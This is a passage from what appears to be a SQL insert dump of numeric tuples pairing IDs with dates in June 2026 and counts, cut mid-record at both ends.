60607',1),(483,0,'20260607',1),(1594,0,'20260607',1),(1596,0,'20260607',1),(1600,0,'20260607',1),(1602,0,'20260607',1),(1604,0,'20260607',1),(1606,0,'20260607',1),(1608,0,'20260607',1),(1610,0,'20260607',1),(1711,0,'20260607',1),(1715,0,'20260607',1),(1728,0,'20260607',1),(1768,0,'20260607',1),(2161,0,'20260607',1),(2457,0,'20260607',1),(2769,0,'20260607',1),(2956,0,'20260607',1),(3004,0,'20260607',1),(3005,0,'20260607',1),(3006,0,'20260607',1),(3023,0,'20260607',1),(3030,0,'20260607',1),(3060,0,'20260607',1),(3253,0,'20260607',1),(3438,0,'20260607',1),(3479,0,'20260607',1),(3781,0,'20260607',1),(4301,0,'20260607',1),(4404,0,'20260607',1),(4457,0,'20260607',1),(4520,0,'20260607',1),(4529,0,'20260607',1),(4654,0,'20260607',1),(4660,0,'20260607',1),(4681,0,'20260607',1),(4712,0,'20260607',1),(4747,0,'20260607',1),(4750,0,'20260607',1),(4866,0,'20260607',1),(5050,0,'20260607',1),(5076,0,'20260607',1),(5253,0,'20260607',1),(5264,0,'20260607',1),(5359,0,'20260607',1),(5400,0,'20260607',1),(5409,0,'20260607',1),(5428,0,'20260607',1),(5449,0,'20260607',1),(5457,0,'20260607',1),(5461,0,'20260607',1),(5489,0,'20260607',1),(5502,0,'20260607',1),(5561,0,'20260607',1),(5567,0,'20260607',1),(5585,0,'20260607',1),(5700,0,'20260607',1),(5735,0,'20260607',1),(5738,0,'20260607',1),(5762,0,'20260607',1),(5778,0,'20260607',1),(5816,0,'20260607',1),(5824,0,'20260607',1),(5828,0,'20260607',1),(5833,0,'20260607',1),(5847,0,'20260607',1),(5868,0,'20260607',1),(5902,0,'20260607',1),(5917,0,'20260607',1),(1586,0,'20260607',2),(1724,0,'20260607',2),(3430,0,'20260607',2),(4335,0,'20260607',2),(4697,0,'20260607',2),(5163,0,'20260607',2),(5454,0,'20260607',2),(5593,0,'20260607',2),(5771,0,'20260607',2),(5859,0,'20260607',2),(5433,0,'20260607',3),(91,0,'20260607',5),(80,0,'20260607',24),(9,0,'20260607',363),(68,0,'20260608',1),(106,0,'20260608',1),(471,0,'20260608',1),(478,0,'20260608',1),(479,0,'20260608',1),(481,0,'20260608',1),(486,0,'20260608',1),(570,0,'20260608',1),(1590,0,'20260608',1),(1592,0,'20260608',1),(1598,0,'20260608',1),(1600,0,'20260608',1),(1604,0,'20260608',1),(1606,0,'20260608',1),(1610,0,'20260608',1),(1614,0,'20260608',1),(1695,0,'20260608',1),(1699,0,'20260608',1),(1705,0,'20260608',1),(1711,0,'20260608',1),(1720,0,'20260608',1),(1726,0,'20260608',1),(1737,0,'20260608',1),(1739,0,'20260608',1),(1745,0,'20260608',1),(1749,0,'20260608',1),(2154,0,'20260608',1),(2178,0,'20260608',1),(2297,0,'20260608',1),(2751,0,'20260608',1),(2769,0,'20260608',1),(2775,0,'20260608',1),(2801,0,'20260608',1),(2809,0,'20260608',1),(2965,0,'20260608',1),(3072,0,'20260608',1),(3083,0,'20260608',1),(3107,0,'20260608',1),(3127,0,'20260608',1),(3229,0,'20260608',1),(3249,0,'20260608',1),(3280,0,'20260608',1),(3285,0,'20260608',1),(3287,0,'20260608',1),(3479,0,'20260608',1),(3498,0,'20260608',1),(3714,0,'20260608',1),(3727,0,'20260608',1),(3752,0,'20260608',1),(3774,0,'20260608',1),(3777,0,'20260608',1),(4332,0,'20260608',1),(4338,0,'20260608',1),(4391,0,'20260608',1),(4396,0,'20260608',1),(4400,0,'20260608',1),(4412,0,'20260608',1),(4424,0,'20260608',1),(4428,0,'20260608',1),(4440,0,'20260608',1),(4444,0,'20260608',1),(4591,0,'20260608',1),(4645,0,'20260608',1),(4654,0,'20260608',1),(4657,0,'20260608',1),(4697,0,'20260608',1),(4700,0,'20260608',1),(4765,0,'20260608',1),(4858,0,'20260608',1),(4897,0,'20260608',1),(4976,0,'20260608',1),(4983,0,'20260608',1),(5042,0,'20260608',1),(5046,0,'20260608',1),(5054,0,'20260608',1),(5058,0,'20260608',1),(5122,0,'20260608',1),(5131,0,'20260608',1),(5140,0,'20260608',1),(5157,0,'20260608',1),(5253,0,'20260608',1),(5289,0,'20260608',1),(5292,0,'20260608',1),(5330,0,'20260608',1),(5356,0,'20260608',1),(5400,0,'20260608',1),(5412,0,'20260608',1),(5425,0,'20260608',1),(5428,0,'20260608',1),(5441,0,'20260608',1),(5567,0,'20260608',1),(5598,0,'20260608',1),(5626,0,'20260608',1),(5662,0,'20260608',1),(5666,0,'20260608',1),(5674,0,'20260608',1),(5700,0,'20260608',1),(5735,0,'20260608',1),(5828,0,'20260608',1),(5847,0,'20260608',1),(89,0,'20260608',2),(467,0,'20260608',2),(469,0,'20260608',2),(474,0,'20260608',2),(476,0,'20260608',2),(477,0,'20260608',2),(480,0,'20260608',2),(483,0,'20260608',2),(484,0,'20260608',2),(485,0,'20260608',2),(487,0,'20260608',2),(488,0,'20260608',2),(1588,0,'20260608',2),(1612,0,'20260608',2),(1707,0,'20260608',2),(1713,0,'20260608',2),(1715,0,'20260608',2),(1722,0,'20260608',2),(1728,0,'20260608',2),(1732,0,'20260608',2),(1734,0,'20260608',2),(1741,0,'20260608',2),(1743,0,'20260608',2),(1747,0,'20260608',2),(1766,0,'20260608',2),(1768,0,'20260608',2),(1776,0,'20260608',2),(1780,0,'20260608',2),(2150,0,'20260608',2),(2156,0,'20260608',2),(2252,0,'20260608',2),(2296,0,'20260608',2),(2309,0,'20260608',2),(2457,0,'20260608',2),(2609,0,'20260608',2),(2617,0,'20260608',2),(2658,0,'20260608',2),(2704,0,'20260608',2),(2748,0,'20260608',2),(2989,0,'20260608',2),(2991,0,'20260608',2),(2993,0,'20260608',2),(3004,0,'20260608',2),(3005,0,'20260608',2),(3006,0,'20260608',2),(3023,0,'20260608',2),(3027,0,'20260608',2),(3038,0,'20260608',2),(3041,0,'20260608',2),(3060,0,'20260608',2),(3063,0,'20260608',2),(3066,0,'20260608',2),(3069,0,'20260608',2),(3079,0,'20260608',2),(3087,0,'20260608',2),(3102,0,'20260608',2),(3109,0,'20260608',2),(3117,0,'20260608',2),(3124,0,'20260608',2),(3226,0,'20260608',2),(3240,0,'20260608',2),(3243,0,'20260608',2),(3245,0,'20260608',2),(3247,0,'20260608',2),(3251,0,'20260608',2),(3253,0,'20260608',2),(3263,0,'20260608',2),(3269,0,'20260608',2),(3271,0,'20260608',2),(3278,0,'20260608',2),(3307,0,'20260608',2),(3313,0,'20260608',2),(3438,0,'20260608',2),(3489,0,'20260608',2),(3531,0,'20260608',2),(3534,0,'20260608',2),(3710,0,'20260608',2),(3724,0,'20260608',2),(3731,0,'20260608',2),(3735,0,'20260608',2),(3738,0,'20260608',2),(3742,0,'20260608',2),(3746,0,'20260608',2),(3749,0,'20260608',2),(3764,0,'20260608',2),(4238,0,'20260608',2),(4301,0,'20260608',2),(4341,0,'20260608',2),(4368,0,'20260608',2),(4377,0,'20260608',2),(4387,0,'20260608',2),(4448,0,'20260608',2),(4457,0,'20260608',2),(4514,0,'20260608',2),(4517,0,'20260608',2),(4524,0,'20260608',2),(4546,0,'20260608',2),(4582,0,'20260608',2),(4612,0,'20260608',2),(4648,0,'20260608',2),(4660,0,'20260608',2),(4663,0,'20260608',2),(4674,0,'20260608',2),(4691,0,'20260608',2),(4694,0,'20260608',2),(4706,0,'20260608',2),(4709,0,'20260608',2),(4712,0,'20260608',2),(4741,0,'20260608',2),(4744,0,'20260608',2),(4750,0,'20260608',2),(4756,0,'20260608',2),(4762,0,'20260608',2),(4862,0,'20260608',2),(4866,0,'20260608',2),(4988,0,'20260608',2),(4996,0,'20260608',2),(5033,0,'20260608',2),(5050,0,'20260608',2),(5062,0,'20260608',2),(5071,0,'20260608',2),(5101,0,'20260608',2),(5134,0,'20260608',2),(5137,0,'20260608',2),(5146,0,'20260608',2),(5153,0,'20260608',2),(5163,0,'20260608',2),(5259,0,'20260608',2),(5264,0,'20260608',2),(5271,0,'20260608',2),(5276,0,'20260608',2),(5280,0,'20260608',2),(5295,0,'20260608',2),(5298,0,'20260608',2),(5304,0,'20260608',2),(5317,0,'20260608',2),(5320,0,'20260608',2),(5323,0,'20260608',2),(5334,0,'20260608',2),(5353,0,'20260608',2),(5363,0,'20260608',2),(5374,0,'20260608',2),(5383,0,'20260608',2),(5420,0,'20260608',2),(5436,0,'20260608',2),(5449,0,'20260608',2),(5454,0,'20260608',2),(5467,0,'20260608',2),(5472,0,'20260608',2),(5492,0,'20260608',2),(5515,0,'20260608',2),(5570,0,'20260608',2),(5585,0,'20260608',2),(5636,0,'20260608',2),(5738,0,'20260608',2),(5762,0,'20260608',2),(5785,0,'20260608',2),(5816,0,'20260608',2),(5833,0,'20260608',2),(5872,0,'20260608',2),(5881,0,'20260608',2),(5902,0,'20260608',2),(5917,0,'20260608',2),(5925,0,'20260608',2),(335,0,'20260608',3),(472,0,'20260608',3),(482,0,'20260608',3),(1608,0,'20260608',3),(1724,0,'20260608',3),(1730,0,'20260608',3),(1770,0,'20260608',3),(1778,0,'20260608',3),(2159,0,'20260608',3),(2165,0,'20260608',3),(2293,0,'20260608',3),(2558,0,'20260608',3),(2804,0,'20260608',3),(2813,0,'20260608',3),(2956,0,'20260608',3),(2964,0,'20260608',3),(3030,0,'20260608',3),(3045,0,'20260608',3),(3090,0,'20260608',3),(3259,0,'20260608',3),(3267,0,'20260608',3),(3282,0,'20260608',3),(3290,0,'20260608',3),(3316,0,'20260608',3),(3721,0,'20260608',3),(3781,0,'20260608',3),(4335,0,'20260608',3),(4357,0,'20260608',3),(4382,0,'20260608',3),(4408,0,'20260608',3),(4420,0,'20260608',3),(4529,0,'20260608',3),(4542,0,'20260608',3),(4608,0,'20260608',3),(4668,0,'20260608',3),(4722,0,'20260608',3),(4870,0,'20260608',3),(4874,0,'20260608',3),(4883,0,'20260608',3),(4893,0,'20260608',3),(4980,0,'20260608',3),(5024,0,'20260608',3),(5080,0,'20260608',3),(5125,0,'20260608',3),(5128,0,'20260608',3),(5268,0,'20260608',3),(5301,0,'20260608',3),(5307,0,'20260608',3),(5359,0,'20260608',3),(5433,0,'20260608',3),(5457,0,'20260608',3),(5461,0,'20260608',3),(5502,0,'20260608',3),(5593,0,'20260608',3),(5601,0,'20260608',3),(5605,0,'20260608',3),(5824,0,'20260608',3),(5859,0,'20260608',3),(5868,0,'20260608',3),(5875,0,'20260608',3),(5889,0,'20260608',3),(5910,0,'20260608',3),(5921,0,'20260608',3),(468,0,'20260608',4),(473,0,'20260608',4),(1586,0,'20260608',4),(1594,0,'20260608',4),(1596,0,'20260608',4),(1701,0,'20260608',4),(1772,0,'20260608',4),(2911,0,'20260608',4),(3034,0,'20260608',4),(3297,0,'20260608',4),(4363,0,'20260608',4),(4416,0,'20260608',4),(4436,0,'20260608',4),(4520,0,'20260608',4),(4703,0,'20260608',4),(4753,0,'20260608',4),(4768,0,'20260608',4),(4771,0,'20260608',4),(4977,0,'20260608',4),(5028,0,'20260608',4),(5076,0,'20260608',4),(5310,0,'20260608',4),(5314,0,'20260608',4),(5378,0,'20260608',4),(5397,0,'20260608',4),(5409,0,'20260608',4),(5769,0,'20260608',4),(5771,0,'20260608',4),(5884,0,'20260608',4),(5930,0,'20260608',4),(74,0,'20260608',5),(84,0,'20260608',5),(87,0,'20260608',5),(108,0,'20260608',5),(470,0,'20260608',5),(1544,0,'20260608',5),(3104,0,'20260608',5),(4747,0,'20260608',5),(4776,0,'20260608',5),(4930,0,'20260608',5),(5865,0,'20260608',5),(5878,0,'20260608',5),(5906,0,'20260608',5),(76,0,'20260608',7),(1602,0,'20260608',7),(5406,0,'20260608',7),(5464,0,'20260608',7),(5489,0,'20260608',7),(1582,0,'20260608',8),(3541,0,'20260608',8),(2503,0,'20260608',10),(91,0,'20260608',12),(80,0,'20260608',15),(72,0,'20260608',16),(9,0,'20260608',566),(74,0,'20260609',1),(76,0,'20260609',1),(108,0,'20260609',1),(468,0,'20260609',1),(469,0,'20260609',1),(570,0,'20260609',1),(1598,0,'20260609',1),(1602,0,'20260609',1),(1610,0,'20260609',1),(1612,0,'20260609',1),(1705,0,'20260609',1),(1718,0,'20260609',1),(1726,0,'20260609',1),(1728,0,'20260609',1),(1768,0,'20260609',1),(1772,0,'20260609',1),(1778,0,'20260609',1),(2503,0,'20260609',1),(2704,0,'20260609',1),(2775,0,'20260609',1),(2801,0,'20260609',1),(2804,0,'20260609',1),(2813,0,'20260609',1),(3005,0,'20260609',1),(3006,0,'20260609',1),(3045,0,'20260609',1),(3063,0,'20260609',1),(3066,0,'20260609',1),(3072,0,'20260609',1),(3109,0,'20260609',1),(3127,0,'20260609',1),(3271,0,'20260609',1),(3275,0,'20260609',1),(3486,0,'20260609',1),(3714,0,'20260609',1),(3727,0,'20260609',1),(3735,0,'20260609',1),(3774,0,'20260609',1),(4323,0,'20260609',1),(4326,0,'20260609',1),(4357,0,'20260609',1),(4373,0,'20260609',1),(4391,0,'20260609',1),(4404,0,'20260609',1),(4416,0,'20260609',1),(4420,0,'20260609',1),(4440,0,'20260609',1),(4448,0,'20260609',1),(4529,0,'20260609',1),(4542,0,'20260609',1),(4566,0,'20260609',1),(4677,0,'20260609',1),(4685,0,'20260609',1),(4688,0,'20260609',1),(4697,0,'20260609',1),(4703,0,'20260609',1),(4750,0,'20260609',1),(4765,0,'20260609',1),(4776,0,'20260609',1),(4862,0,'20260609',1),(4888,0,'20260609',1),(4893,0,'20260609',1),(4897,0,'20260609',1),(4983,0,'20260609',1),(4996,0,'20260609',1),(5033,0,'20260609',1),(5050,0,'20260609',1),(5076,0,'20260609',1),(5101,0,'20260609',1),(5137,0,'20260609',1),(5153,0,'20260609',1),(5163,0,'20260609',1),(5307,0,'20260609',1),(5314,0,'20260609',1),(5353,0,'20260609',1),(5356,0,'20260609',1),(5400,0,'20260609',1),(5415,0,'20260609',1),(5428,0,'20260609',1),(5449,0,'20260609',1),(5457,0,'20260609',1),(5570,0,'20260609',1),(5578,0,'20260609',1),(5582,0,'20260609',1),(5626,0,'20260609',1),(5636,0,'20260609',1),(5738,0,'20260609',1),(5769,0,'20260609',1),(5771,0,'20260609',1),(5821,0,'20260609',1),(5828,0,'20260609',1),(5833,0,'20260609',1),(5872,0,'20260609',1),(5875,0,'20260609',1),(5884,0,'20260609',1),(5889,0,'20260609',1),(5910,0,'20260609',1),(5921,0,'20260609',1),(5925,0,'20260609',1),(335,0,'20260609',2),(467,0,'20260609',2),(478,0,'20260609',2),(1544,0,'20260609',2),(1586,0,'20260609',2),(1608,0,'20260609',2),(1780,0,'20260609',2),(2148,0,'20260609',2),(3083,0,'20260609',2),(3107,0,'20260609',2),(3251,0,'20260609',2),(4301,0,'20260609',2),(4977,0,'20260609',2),(4980,0,'20260609',2),(5071,0,'20260609',2),(5310,0,'20260609',2),(5317,0,'20260609',2),(5334,0,'20260609',2),(5420,0,'20260609',2),(5461,0,'20260609',2),(5515,0,'20260609',2),(5662,0,'20260609',2),(5674,0,'20260609',2),(5696,0,'20260609',2),(5847,0,'20260609',2),(5878,0,'20260609',2),(5906,0,'20260609',2),(5917,0,'20260609',2),(5945,0,'20260609',2),(72,0,'20260609',3),(84,0,'20260609',3),(470,0,'20260609',3),(474,0,'20260609',3),(476,0,'20260609',3),(1582,0,'20260609',3),(1614,0,'20260609',3),(5298,0,'20260609',3),(5409,0,'20260609',3),(89,0,'20260609',4),(91,0,'20260609',4),(4457,0,'20260609',4),(5125,0,'20260609',4),(5397,0,'20260609',4),(5930,0,'20260609',4),(80,0,'20260609',5),(4335,0,'20260609',5),(5593,0,'20260609',5),(9,0,'20260609',459),(84,0,'20260610',1),(108,0,'20260610',1),(110,0,'20260610',1),(335,0,'20260610',1),(467,0,'20260610',1),(487,0,'20260610',1),(570,0,'20260610',1),(1598,0,'20260610',1),(1612,0,'20260610',1),(1707,0,'20260610',1),(1711,0,'20260610',1),(1722,0,'20260610',1),(1724,0,'20260610',1),(1776,0,'20260610',1),(2148,0,'20260610',1),(2457,0,'20260610',1),(2503,0,'20260610',1),(2704,0,'20260610',1),(2769,0,'20260610',1),(2775,0,'20260610',1),(2911,0,'20260610',1),(3092,0,'20260610',1),(3096,0,'20260610',1),(3127,0,'20260610',1),(3240,0,'20260610',1),(3247,0,'20260610',1),(3275,0,'20260610',1),(3280,0,'20260610',1),(3307,0,'20260610',1),(3486,0,'20260610',1),(3710,0,'20260610',1),(3742,0,'20260610',1),(4382,0,'20260610',1),(4396,0,'20260610',1),(4400,0,'20260610',1),(4404,0,'20260610',1),(4408,0,'20260610',1),(4420,0,'20260610',1),(4759,0,'20260610',1),(4792,0,'20260610',1),(4858,0,'20260610',1),(4930,0,'20260610',1),(4988,0,'20260610',1),(5268,0,'20260610',1),(5276,0,'20260610',1),(5304,0,'20260610',1),(5310,0,'20260610',1),(5323,0,'20260610',1),(5378,0,'20260610',1),(5400,0,'20260610',1),(5409,0,'20260610',1),(5420,0,'20260610',1),(5598,0,'20260610',1),(5626,0,'20260610',1),(5674,0,'20260610',1),(5771,0,'20260610',1),(5778,0,'20260610',1),(5824,0,'20260610',1),(5833,0,'20260610',1),(5868,0,'20260610',1),(5872,0,'20260610',1),(5878,0,'20260610',1),(5921,0,'20260610',1),(74,0,'20260610',2),(89,0,'20260610',2),(474,0,'20260610',2),(1604,0,'20260610',2),(1728,0,'20260610',2),(1778,0,'20260610',2),(1780,0,'20260610',2),(3097,0,'20260610',2),(3107,0,'20260610',2),(3226,0,'20260610',2),(4722,0,'20260610',2),(4756,0,'20260610',2),(5489,0,'20260610',2),(5593,0,'20260610',2),(5762,0,'20260610',2),(5881,0,'20260610',2),(5902,0,'20260610',2),(5906,0,'20260610',2),(5910,0,'20260610',2),(76,0,'20260610',3),(87,0,'20260610',3),(3038,0,'20260610',3),(4335,0,'20260610',3),(5163,0,'20260610',3),(5847,0,'20260610',3),(1747,0,'20260610',4),(5585,0,'20260610',4),(72,0,'20260610',5),(91,0,'20260610',5),(1582,0,'20260610',5),(5884,0,'20260610',5),(5945,0,'20260610',8),(80,0,'20260610',9),(9,0,'20260610',352),(72,0,'20260611',1),(471,0,'20260611',1),(1588,0,'20260611',1),(1592,0,'20260611',1),(1600,0,'20260611',1),(1612,0,'20260611',1),(1703,0,'20260611',1),(1715,0,'20260611',1),(1776,0,'20260611',1),(2150,0,'20260611',1),(2296,0,'20260611',1),(2617,0,'20260611',1),(2704,0,'20260611',1),(2769,0,'20260611',1),(2775,0,'20260611',1),(3117,0,'20260611',1),(4238,0,'20260611',1),(4387,0,'20260611',1),(4542,0,'20260611',1),(4668,0,'20260611',1),(4870,0,'20260611',1),(4983,0,'20260611',1),(5067,0,'20260611',1),(5146,0,'20260611',1),(5280,0,'20260611',1),(5317,0,'20260611',1),(5449,0,'20260611',1),(5567,0,'20260611',1),(80,0,'20260611',2),(91,0,'20260611',2),(3127,0,'20260611',2),(4556,0,'20260611',2),(4747,0,'20260611',2),(5062,0,'20260611',2),(5397,0,'20260611',2),(5489,0,'20260611',2),(5824,0,'20260611',2),(4546,0,'20260611',3),(2904,0,'20260611',92),(9,0,'20260611',109),(84,0,'20260612',1),(108,0,'20260612',1),(468,0,'20260612',1),(471,0,'20260612',1),(477,0,'20260612',1),(1582,0,'20260612',1),(1600,0,'20260612',1),(1612,0,'20260612',1),(1730,0,'20260612',1),(1732,0,'20260612',1),(1741,0,'20260612',1),(1743,0,'20260612',1),(1768,0,'20260612',1),(2150,0,'20260612',1),(2161,0,'20260612',1),(2309,0,'20260612',1),(2503,0,'20260612',1),(2809,0,'20260612',1),(3087,0,'20260612',1),(3096,0,'20260612',1),(3253,0,'20260612',1),(3290,0,'20260612',1),(3297,0,'20260612',1),(3307,0,'20260612',1),(3313,0,'20260612',1),(3489,0,'20260612',1),(3710,0,'20260612',1),(3724,0,'20260612',1),(3752,0,'20260612',1),(4335,0,'20260612',1),(4338,0,'20260612',1),(4428,0,'20260612',1),(4436,0,'20260612',1),(4444,0,'20260612',1),(4520,0,'20260612',1),(4556,0,'20260612',1),(4744,0,'20260612',1),(4771,0,'20260612',1),(4977,0,'20260612',1),(4988,0,'20260612',1),(5042,0,'20260612',1),(5062,0,'20260612',1),(5101,0,'20260612',1),(5264,0,'20260612',1),(5276,0,'20260612',1),(5298,0,'20260612',1),(5326,0,'20260612',1),(5359,0,'20260612',1),(5363,0,'20260612',1),(5406,0,'20260612',1),(5464,0,'20260612',1),(5502,0,'20260612',1),(5512,0,'20260612',1),(5567,0,'20260612',1),(5570,0,'20260612',1),(5585,0,'20260612',1),(5700,0,'20260612',1),(5762,0,'20260612',1),(5769,0,'20260612',1),(5771,0,'20260612',1),(5824,0,'20260612',1),(5875,0,'20260612',1),(5902,0,'20260612',1),(5906,0,'20260612',1),(5910,0,'20260612',1),(5921,0,'20260612',1),(72,0,'20260612',2),(80,0,'20260612',2),(1608,0,'20260612',2),(1614,0,'20260612',2),(1728,0,'20260612',2),(1776,0,'20260612',2),(1778,0,'20260612',2),(3005,0,'20260612',2),(4404,0,'20260612',2),(4420,0,'20260612',2),(4930,0,'20260612',2),(5409,0,'20260612',2),(5467,0,'20260612',2),(5489,0,'20260612',2),(5593,0,'20260612',2),(5778,0,'20260612',2),(5816,0,'20260612',2),(5917,0,'20260612',2),(91,0,'20260612',3),(1588,0,'20260612',3),(5378,0,'20260612',3),(5821,0,'20260612',3),(5859,0,'20260612',3),(5397,0,'20260612',8),(9,0,'20260612',217),(2904,0,'20260612',235),(102,0,'20260613',1),(467,0,'20260613',1),(471,0,'20260613',1),(472,0,'20260613',1),(476,0,'20260613',1),(477,0,'20260613',1),(478,0,'20260613',1),(479,0,'20260613',1),(480,0,'20260613',1),(481,0,'20260613',1),(482,0,'20260613',1),(483,0,'20260613',1),(484,0,'20260613',1),(485,0,'20260613',1),(486,0,'20260613',1),(488,0,'20260613',1),(1544,0,'20260613',1),(1582,0,'20260613',1),(1584,0,'20260613',1),(1586,0,'20260613',1),(1588,0,'20260613',1),(1590,0,'20260613',1),(1592,0,'20260613',1),(1594,0,'20260613',1),(1598,0,'20260613',1),(1600,0,'20260613',1),(1602,0,'20260613',1),(1604,0,'20260613',1),(1606,0,'20260613',1),(1718,0,'20260613',1),(1780,0,'20260613',1),(2063,0,'20260613',1),(3027,0,'20260613',1),(3066,0,'20260613',1),(3092,0,'20260613',1),(3102,0,'20260613',1),(3104,0,'20260613',1),(3243,0,'20260613',1),(3764,0,'20260613',1),(3774,0,'20260613',1),(3781,0,'20260613',1),(4238,0,'20260613',1),(4363,0,'20260613',1),(4412,0,'20260613',1),(4444,0,'20260613',1),(4454,0,'20260613',1),(4524,0,'20260613',1),(4741,0,'20260613',1),(5125,0,'20260613',1),(5326,0,'20260613',1),(5330,0,'20260613',1),(5363,0,'20260613',1),(5378,0,'20260613',1),(5383,0,'20260613',1),(5397,0,'20260613',1),(5406,0,'20260613',1),(5415,0,'20260613',1),(5489,0,'20260613',1),(5567,0,'20260613',1),(5570,0,'20260613',1),(5609,0,'20260613',1),(5626,0,'20260613',1),(5666,0,'20260613',1),(5762,0,'20260613',1),(5769,0,'20260613',1),(5821,0,'20260613',1),(5828,0,'20260613',1),(5844,0,'20260613',1),(5868,0,'20260613',1),(5872,0,'20260613',1),(5878,0,'20260613',1),(5881,0,'20260613',1),(5884,0,'20260613',1),(5889,0,'20260613',1),(5902,0,'20260613',1),(469,0,'20260613',2),(1596,0,'20260613',2),(1709,0,'20260613',2),(5054,0,'20260613',2),(5264,0,'20260613',2),(5409,0,'20260613',2),(5674,0,'20260613',2),(5771,0,'20260613',2),(5824,0,'20260613',2),(5833,0,'20260613',2),(5875,0,'20260613',2),(5921,0,'20260613',2),(5925,0,'20260613',2),(74,0,'20260613',3),(76,0,'20260613',3),(80,0,'20260613',3),(87,0,'20260613',3),(108,0,'20260613',3),(335,0,'20260613',3),(468,0,'20260613',3),(473,0,'20260613',3),(474,0,'20260613',3),(487,0,'20260613',3),(1608,0,'20260613',3),(1726,0,'20260613',3),(2503,0,'20260613',3),(2658,0,'20260613',3),(5374,0,'20260613',3),(5917,0,'20260613',3),(84,0,'20260613',4),(470,0,'20260613',4),(4930,0,'20260613',4),(5910,0,'20260613',4),(5930,0,'20260613',4),(89,0,'20260613',5),(91,0,'20260613',5),(5906,0,'20260613',5),(5945,0,'20260613',5),(72,0,'20260613',7),(9,0,'20260613',125),(2904,0,'20260613',359),(74,0,'20260615',1),(335,0,'20260615',1),(467,0,'20260615',1),(1592,0,'20260615',1),(1701,0,'20260615',1),(1705,0,'20260615',1),(1707,0,'20260615',1),(1720,0,'20260615',1),(1722,0,'20260615',1),(1726,0,'20260615',1),(1737,0,'20260615',1),(1768,0,'20260615',1),(2152,0,'20260615',1),(2165,0,'20260615',1),(2178,0,'20260615',1),(2296,0,'20260615',1),(2297,0,'20260615',1),(2558,0,'20260615',1),(2704,0,'20260615',1),(2775,0,'20260615',1),(2801,0,'20260615',1),(2804,0,'20260615',1),(2809,0,'20260615',1),(2956,0,'20260615',1),(3006,0,'20260615',1),(3023,0,'20260615',1),(3027,0,'20260615',1),(3030,0,'20260615',1),(3038,0,'20260615',1),(3045,0,'20260615',1),(3069,0,'20260615',1),(3072,0,'20260615',1),(3097,0,'20260615',1),(3102,0,'20260615',1),(3243,0,'20260615',1),(3245,0,'20260615',1),(3263,0,'20260615',1),(3265,0,'20260615',1),(3269,0,'20260615',1),(3273,0,'20260615',1),(3275,0,'20260615',1),(3290,0,'20260615',1),(3313,0,'20260615',1),(3486,0,'20260615',1),(3489,0,'20260615',1),(3498,0,'20260615',1),(3531,0,'20260615',1),(3534,0,'20260615',1),(3714,0,'20260615',1),(3749,0,'20260615',1),(3752,0,'20260615',1),(3771,0,'20260615',1),(4301,0,'20260615',1),(4332,0,'20260615',1),(4335,0,'20260615',1),(4338,0,'20260615',1),(4341,0,'20260615',1),(4368,0,'20260615',1),(4373,0,'20260615',1),(4377,0,'20260615',1),(4382,0,'20260615',1),(4400,0,'20260615',1),(4424,0,'20260615',1),(4440,0,'20260615',1),(4444,0,'20260615',1),(4448,0,'20260615',1),(4529,0,'20260615',1),(4608,0,'20260615',1),(4648,0,'20260615',1),(4688,0,'20260615',1),(4756,0,'20260615',1),(4776,0,'20260615',1),(4792,0,'20260615',1),(4797,0,'20260615',1),(4878,0,'20260615',1),(4977,0,'20260615',1),(4980,0,'20260615',1),(4988,0,'20260615',1),(5042,0,'20260615',1),(5067,0,'20260615',1),(5122,0,'20260615',1),(5131,0,'20260615',1),(5134,0,'20260615',1),(5137,0,'20260615',1),(5153,0,'20260615',1),(5253,0,'20260615',1),(5271,0,'20260615',1),(5280,0,'20260615',1),(5301,0,'20260615',1),(5304,0,'20260615',1),(5310,0,'20260615',1),(5314,0,'20260615',1),(5326,0,'20260615',1),(5359,0,'20260615',1),(5378,0,'20260615',1),(5406,0,'20260615',1),(5412,0,'20260615',1),(5449,0,'20260615',1),(5454,0,'20260615',1),(5461,0,'20260615',1),(5467,0,'20260615',1),(5515,0,'20260615',1),(5578,0,'20260615',1),(5593,0,'20260615',1),(5598,0,'20260615',1),(5636,0,'20260615',1),(5683,0,'20260615',1),(5700,0,'20260615',1),(5769,0,'20260615',1),(5771,0,'20260615',1),(5778,0,'20260615',1),(5785,0,'20260615',1),(5824,0,'20260615',1),(5844,0,'20260615',1),(5847,0,'20260615',1),(5865,0,'20260615',1),(5881,0,'20260615',1),(5884,0,'20260615',1),(5902,0,'20260615',1),(5917,0,'20260615',1),(5921,0,'20260615',1),(5925,0,'20260615',1),(5930,0,'20260615',1),(102,0,'20260615',2),(471,0,'20260615',2),(480,0,'20260615',2),(484,0,'20260615',2),(570,0,'20260615',2),(1582,0,'20260615',2),(1586,0,'20260615',2),(1590,0,'20260615',2),(1596,0,'20260615',2),(1598,0,'20260615',2),(1612,0,'20260615',2),(1695,0,'20260615',2),(1724,0,'20260615',2),(1745,0,'20260615',2),(1774,0,'20260615',2),(2154,0,'20260615',2),(2457,0,'20260615',2),(2658,0,'20260615',2),(2769,0,'20260615',2),(2904,0,'20260615',2),(3034,0,'20260615',2),(3083,0,'20260615',2),(3087,0,'20260615',2),(3090,0,'20260615',2),(3117,0,'20260615',2),(3124,0,'20260615',2),(3240,0,'20260615',2),(3251,0,'20260615',2),(3259,0,'20260615',2),(3267,0,'20260615',2),(3287,0,'20260615',2),(3746,0,'20260615',2),(3764,0,'20260615',2),(4238,0,'20260615',2),(4329,0,'20260615',2),(4363,0,'20260615',2),(4387,0,'20260615',2),(4412,0,'20260615',2),(4416,0,'20260615',2),(4582,0,'20260615',2),(4645,0,'20260615',2),(4697,0,'20260615',2),(4741,0,'20260615',2),(4802,0,'20260615',2),(4862,0,'20260615',2),(5037,0,'20260615',2),(5050,0,'20260615',2),(5054,0,'20260615',2),(5058,0,'20260615',2),(5071,0,'20260615',2),(5076,0,'20260615',2),(5140,0,'20260615',2),(5163,0,'20260615',2),(5259,0,'20260615',2),(5298,0,'20260615',2),(5307,0,'20260615',2),(5317,0,'20260615',2),(5320,0,'20260615',2),(5374,0,'20260615',2),(5397,0,'20260615',2),(5400,0,'20260615',2),(5409,0,'20260615',2),(5415,0,'20260615',2),(5420,0,'20260615',2),(5436,0,'20260615',2),(5457,0,'20260615',2),(5464,0,'20260615',2),(5492,0,'20260615',2),(5570,0,'20260615',2),(5674,0,'20260615',2),(5859,0,'20260615',2),(5889,0,'20260615',2),(5906,0,'20260615',2),(473,0,'20260615',3),(485,0,'20260615',3),(488,0,'20260615',3),(1584,0,'20260615',3),(1602,0,'20260615',3),(1697,0,'20260615',3),(1709,0,'20260615',3),(1711,0,'20260615',3),(1715,0,'20260615',3),(1730,0,'20260615',3),(1739,0,'20260615',3),(1741,0,'